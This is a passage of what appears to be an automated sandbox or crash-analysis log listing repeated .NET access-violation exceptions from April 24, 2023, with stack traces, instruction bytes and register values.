0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828424 registers.edi: 1828768 registers.eax: 0 registers.ebp: 1828432 registers.edx: 0 registers.ebx: 1831188 registers.esi: 55452048 registers.ecx: 54416968	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5384021 0x5383e82 0x5383d6d 0x538260b 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828136 registers.edi: 1828436 registers.eax: 0 registers.ebp: 1828448 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54403048 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x53845ec 0x5383e82 0x5383d6d 0x538260b 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828424 registers.edi: 1828768 registers.eax: 0 registers.ebp: 1828432 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54403048 registers.ecx: 54619508	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388b08 0x5388959 0x5383d55 0x53828f4 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828112 registers.edi: 1828412 registers.eax: 0 registers.ebp: 1828424 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538909e 0x5388959 0x5383d55 0x53828f4 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828400 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828408 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 56054380	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388b08 0x5388959 0x5383d6d 0x53828f4 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828112 registers.edi: 1828412 registers.eax: 0 registers.ebp: 1828424 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538909e 0x5388959 0x5383d6d 0x53828f4 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828400 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828408 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 57404068	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388b08 0x5388959 0x5383d6d 0x53828f4 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828112 registers.edi: 1828412 registers.eax: 0 registers.ebp: 1828424 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538909e 0x5388959 0x5383d6d 0x53828f4 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828400 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828408 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 54619508	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5389442 0x5389251 0x5383d55 0x5382a0c 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828164 registers.edi: 1828464 registers.eax: 0 registers.ebp: 1828476 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x53898aa 0x5389251 0x5383d55 0x5382a0c 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828452 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828460 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 55994696	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5389442 0x5389251 0x5383d6d 0x5382a0c 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828164 registers.edi: 1828464 registers.eax: 0 registers.ebp: 1828476 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x53898aa 0x5389251 0x5383d6d 0x5382a0c 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828452 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828460 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 55488448	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5389442 0x5389251 0x5383d6d 0x5382a0c 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828164 registers.edi: 1828464 registers.eax: 0 registers.ebp: 1828476 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x53898aa 0x5389251 0x5383d6d 0x5382a0c 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828452 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828460 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 54596400	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5389d1c 0x5389b39 0x5383d55 0x5382b12 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828196 registers.edi: 1828496 registers.eax: 0 registers.ebp: 1828508 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538a0dc 0x5389b39 0x5383d55 0x5382b12 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828484 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828492 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 56094628	1
